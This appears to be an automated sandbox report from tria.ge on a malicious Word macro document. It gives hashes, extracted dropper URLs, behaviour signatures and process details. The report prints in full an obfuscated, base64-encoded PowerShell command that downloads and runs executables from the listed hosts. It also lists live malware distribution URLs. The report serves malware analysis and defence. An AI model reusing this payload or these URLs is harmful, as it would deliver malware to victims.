Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

d5b5cfbb95...18.doc

windows7-x64

10

d5b5cfbb95...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    101s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    09/09/2024, 05:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d5b5cfbb95df232743dbad75d02c5575_JaffaCakes118.doc

  • Size

    166KB

  • MD5

    d5b5cfbb95df232743dbad75d02c5575

  • SHA1

    4cd181c06fe8b720867ca8371e4410d3a4898852

  • SHA256

    40553c3c1a1a2ff36541fff6d148b3d3a89962869b7d29d3dd978f4957bb53d5

  • SHA512

    6cf5a4b94a32af8f2e7f1389a8f6905f30c2380b1f8f67354d0a9b0d09619a9f0b3c7ed4aa3b8536b214fb51260162089d1b7116181718011b535123d9f80d70

  • SSDEEP

    1536:pARD3bNqfNpu39IId5a6XP3Mg8afmqTdotKdz/Rek6Ef3Ei9WEvOk:OR1qf69xak3MgxmFKl/R89i9WAOk

Score
10/10
discovery

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://odeftg.com/odeftg.com/S/
exe.dropper

http://hbprivileged.com/info/S/
exe.dropper

http://equipamentosmix.com/10/U/
exe.dropper

http://mianusman.com/cgi-bin/Fo/
exe.dropper

https://www.hairlineunisexsalon.com/demo/CyD/
exe.dropper

http://liulibug.com/wp-admin/8Aw/
exe.dropper

https://fcbc.group/wp-includes/O/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d5b5cfbb95df232743dbad75d02c5575_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2160
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABRAGsAYwBtADEAawB4AD0AKAAoACcAWgAnACsAJwB6AHAAJwApACsAJwAyADUAJwArACcAMABvACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAcgBwAFIATwBGAGkAbABFAFwARwAwAFcAcAB2AFoAQQBcAGQAVQB1ADcAYwB6AHQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBjAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAFUAUgBJAGAAVABZAFAAYABSAE8AVABvAEMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAJwArACcAcwAxADIALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwArACcAMQAxACcAKwAoACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABZAF8AcQBsAHkAegA0ACAAPQAgACgAKAAnAFYAZwAnACsAJwAxACcAKQArACcAeQA1ACcAKwAnAGwAJwApADsAJABDAGUAZAA2AHcAMgBpAD0AKAAoACcARwByACcAKwAnADQAJwApACsAKAAnAHkAJwArACcAbwB3AHIAJwApACkAOwAkAFUAZQA0AF8AZgBsAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAOQBJACcAKwAoACcAawAnACsAJwBHADAAJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwB2AHoAJwApACsAJwBhACcAKwAoACcAOQBJAGsAJwArACcARAB1AHUANwAnACsAJwBjAHoAdAA5AEkAawAnACkAKQAgACAALQBjAFIARQBwAEwAQQBDAEUAIAAoAFsAQwBoAEEAUgBdADUANwArAFsAQwBoAEEAUgBdADcAMwArAFsAQwBoAEEAUgBdADEAMAA3ACkALABbAEMAaABBAFIAXQA5ADIAKQArACQAWQBfAHEAbAB5AHoANAArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAWQBsAGMAcQA4AGsAagA9ACgAJwBFAGcAJwArACgAJwBsAGMANwBfACcAKwAnADcAJwApACkAOwAkAEMAbwA5ADcAcQB0AGsAPQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAQwBsAGkAZQBuAFQAOwAkAFcAZABnAG4AMgBrAGoAPQAoACcAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAnAC8AbwAnACsAJwBkAGUAJwArACgAJwBmACcAKwAnAHQAZwAnACkAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAG8AZABlACcAKQArACgAJwBmAHQAZwAnACsAJwAuAGMAbwBtAC8AJwApACsAKAAnAFMAJwArACcALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAGgAYgAnACsAJwBwACcAKwAoACcAcgBpACcAKwAnAHYAJwApACsAKAAnAGkAbAAnACsAJwBlACcAKQArACgAJwBnACcAKwAnAGUAZAAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAvACcAKwAnAGkAJwApACsAKAAnAG4AZgAnACsAJwBvACcAKQArACgAJwAvACcAKwAnAFMALwAqACcAKQArACcAaAAnACsAJwB0ACcAKwAoACcAdABwACcAKwAnADoALwAvAGUAcQAnACkAKwAnAHUAJwArACcAaQAnACsAJwBwACcAKwAoACcAYQBtAGUAJwArACcAbgAnACkAKwAoACcAdABvACcAKwAnAHMAbQBpACcAKQArACcAeAAnACsAJwAuAGMAJwArACgAJwBvACcAKwAnAG0ALwAxACcAKQArACgAJwAwACcAKwAnAC8AVQAnACkAKwAnAC8AJwArACcAKgBoACcAKwAoACcAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AbQBpACcAKQArACgAJwBhAG4AdQBzACcAKwAnAG0AYQAnACkAKwAoACcAbgAuACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAbQAnACsAJwAvAGMAZwBpACcAKQArACcALQBiACcAKwAnAGkAJwArACgAJwBuAC8ARgBvACcAKwAnAC8AJwApACsAJwAqACcAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcABzADoAJwArACcALwAnACkAKwAnAC8AdwAnACsAJwB3AHcAJwArACgAJwAuAGgAJwArACcAYQBpAHIAbABpAG4AZQB1AG4AaQAnACsAJwBzAGUAeABzACcAKQArACgAJwBhAGwAJwArACcAbwBuAC4AJwApACsAJwBjACcAKwAoACcAbwBtAC8AJwArACcAZAAnACsAJwBlAG0AJwApACsAKAAnAG8ALwBDAHkAJwArACcARAAnACsAJwAvACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGwAaQB1ACcAKwAnAGwAaQAnACkAKwAnAGIAJwArACgAJwB1AGcALgAnACsAJwBjAG8AJwApACsAJwBtAC8AJwArACgAJwB3AHAAJwArACcALQBhAGQAJwArACcAbQBpAG4ALwAnACkAKwAoACcAOABBAHcAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwAHMAOgAnACsAJwAvAC8AJwApACsAJwBmACcAKwAoACcAYwBiAGMALgAnACsAJwBnACcAKQArACcAcgBvACcAKwAoACcAdQBwACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBpACcAKwAnAG4AYwBsAHUAJwApACsAKAAnAGQAZQBzACcAKwAnAC8ATwAnACsAJwAvACcAKQApAC4AIgBTAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEkAaABfAGgAeABwAGIAPQAoACgAJwBUACcAKwAnAGkAZgBrACcAKQArACgAJwBiACcAKwAnAGsAXwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFkAdwBhADAAdwBxADIAIABpAG4AIAAkAFcAZABnAG4AMgBrAGoAKQB7AHQAcgB5AHsAJABDAG8AOQA3AHEAdABrAC4AIgBkAE8AYAB3AE4AYABsAE8AQQBEAEYAaQBsAEUAIgAoACQAWQB3AGEAMAB3AHEAMgAsACAAJABVAGUANABfAGYAbABlACkAOwAkAEoAYgAzAG4AMwA2AGcAPQAoACcAVwBnACcAKwAoACcAegBxAHEAJwArACcAZwAnACkAKwAnAHUAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFUAZQA0AF8AZgBsAGUAKQAuACIAbABgAEUAYABOAGcAdABIACIAIAAtAGcAZQAgADIANQA3ADYANAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACgAJABVAGUANABfAGYAbABlACkAOwAkAFoAbQBnAHgAagBzAHQAPQAoACcARwAxACcAKwAoACcAeQBmACcAKwAnAF8AJwApACsAJwA2ADgAJwApADsAYgByAGUAYQBrADsAJABSADEANQBpAHMAYgByAD0AKAAoACcARQBtAHEAJwArACcAMgB3ACcAKQArACcAbgB1ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwB6AGMAMAA1AGEAZAA9ACgAKAAnAEYAZAB0ACcAKwAnAGYAJwApACsAJwBzACcAKwAnAHkANwAnACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2792

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      8740067c3d767b8b0085ff6eb380f9e1

      SHA1

      14f9ccf6112e2e45d4f065e1fb4af224a1494d20

      SHA256

      fba224eb1d5b9d967d923b87d4e9a6d949aeffbb4253796836e90af3af656984

      SHA512

      91cee92e4e5fd6e7262527f83f6b0b0589b38864c232482a9ffd8f4d19d817e99a7c84993f25a9eaeac6f702ec430ebf0841c3217f3dd1849fcbcccebe5c271b

      Download Submit

    • memory/1712-40-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-2-0x00000000713BD000-0x00000000713C8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1712-6-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-12-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-26-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-25-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-33-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-34-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-0-0x000000002F511000-0x000000002F512000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1712-39-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-48-0x00000000713BD000-0x00000000713C8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1712-72-0x00000000713BD000-0x00000000713C8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1712-71-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1712-49-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-50-0x0000000006A30000-0x0000000006B30000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-51-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-55-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1712-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2792-46-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2792-47-0x0000000002910000-0x0000000002918000-memory.dmp

      Filesize

      32KB

      Download